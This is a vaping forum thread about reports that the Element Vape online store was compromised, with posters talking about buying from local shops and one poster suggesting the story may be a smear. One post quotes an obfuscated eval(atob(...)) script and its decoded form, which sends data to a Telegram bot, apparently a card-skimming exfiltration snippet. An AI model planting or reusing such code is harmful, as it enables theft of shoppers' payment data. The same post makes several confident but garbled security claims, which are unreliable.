Become a Patron!

Element Vape May Be Compromised

Syythe

Silver Contributor
Member For 4 Years
ECF Refugee

VapeOn1960

Gold Contributor
Member For 4 Years
ECF Refugee
That's really bad news. I like Element and am in CA so was hoping to make another order soon (my last order from Direct vapor, that I have used many times before, took 1 month to arrive) I figured being in CA, shipping might not take so long. The fun never ends.
 

VapeOn1960

Gold Contributor
Member For 4 Years
ECF Refugee
looks like i am gonna pay inflated prices having my local b/m special order stuff for me now
I know that sucks but at least you are supporting your local B&M and that's good. With high shipping and adult signature fees it will cost more anyway to order things. I wonder if local shops might do something like make a list of requested items and if they are mentioned often, they might consider stocking those items regularly. Just a thought...
 

kingshockey

Member For 4 Years
I know that sucks but at least you are supporting your local B&M and that's good. With high shipping and adult signature fees it will cost more anyway to order things. I wonder if local shops might do something like make a list of requested items and if they are mentioned often, they might consider stocking those items regularly. Just a thought...
i am all about instant gratification haha nothing better than walking out of a shop and being able to use new gear right away
 

MyMagicMist

Diamond Contributor
ECF Refugee
Member For 5 Years
Every few months there is an attack to steal information. Don't know what they're doing.

Information is power. Stealing information is stealing power. Seems obvious enough.

Might be a ploy. Not saying it is for sure. Though, having media run stories about vaping vendors being compromised might be a way to interrupt legitimate business.

"Oh no, all our favorite vaping vendors are compromised. They get the pay data stolen. Whatever are we to do? Boycott the vaping vendors! Run for your lives!"

That would effectively fold up vendors that may be small business yet are highly credible. If they're not getting business well they got no choice but to close up shop. Again not saying this is absolutely the case, saying though I could see how it might feasibly be so.


This should tell you enough: "eval(atob("IHZhciB4ID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7CiAgICB4Lm9wZW4oIlBPU1QiLCAiaHR0cHM6Ly9hcGkudGVsZWdyYW0ub3JnL2JvdCIrdGJvdCsiL3NlbmRNZXNzYWdlIiwgdHJ1ZSk7CiAgICB4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHlwZScsICdhcHBsaWNhdGlvbi9qc29uOyBjaGFyc2V0PXV0Zi04Jyk7CiAgICB4LndpdGhDcmVkZW50aWFscyA9IGZhbHNlOwp2YXIgZGQgPSBKU09OLnN0cmluZ2lmeSh7IAogICAgY2hhdF9pZDogdGNoYXQsCiAgICB0ZXh0OiB0bWVzc2FnZQogfSk7CiAgICB4LnNlbmQoZGQpOw=="));"


decoded: var x = new XMLHttpRequest(); x.open("POST", "https://api . telegram . org/bot"+tbot+"/sendMessage", true); x.setRequestHeader('Content-Type', 'application/json; charset=utf-8'); x.withCredentials = false; var dd = JSON.stringify({ chat_id: tchat, text: tmessage }); x.send(dd);

No it really doesn't as there's a lack of context. Is this script an actual valid call to perhaps legitimate manner of processing payment data? Can see it parses the data out as a text message for a Telgram app chat bot.

Telegram chat is end to end encrypted by default. Unlikely there would be a man in the middle attack. It usually uses a OTP (One Time Password/Passphrase) to run such global variables. So finding a salt key for the hash would be very highly difficult, take far too long to be of benefit.

Does this Telegram bot log all transactions for someone? What is the intention/s here? What is the motive/s?

There's none of this discussed, simply "oh, well there's scripts on sites." Yes, modern sites now routinely use scripts. Where you been for the last thirty years? And yes, I know there are malicious actors and malicious scripts. My point here is we're not being given all the information, all the context. We cannot determine jack.

"This site uses scripts."

"Um, okay? And, ...?"

A lot can be done and be valid, legitimate, above board. Merely because you see a site using a script/s does not infer nefarious intent. All that is masked and not presented. There's a "slant" being pushed. "Oh fear, gloom and doom."

Again I'm not saying all that's going on is legit. Nor am I saying for sure someone is running disinformation with this article. I am saying we ought to ask for further context. We ought to think for ourselves, and think critically.

If indeed this is nefarious or malicious, is there evidence of it, where? Can the public see please?

If not well then quit fear mongering.

Read the article. Appears that someone inside might have added code. If not, then someone injected code from outside. The point is then that the site has been cracked. I would figure the site uses algorithms to protect financial data.

The access control list for that would be very limited. You might have a developer with access, finance person. Point being that access would be restricted.

Could someone inject something? Possibly, but they would first need to garner root access. That is even further restricted. The hosting company might have access, and a site administrator.

It's not unlikely a pass was cracked. It could happen. Still one would think such access would be better protected.
 
Last edited:

VU Sponsors

Top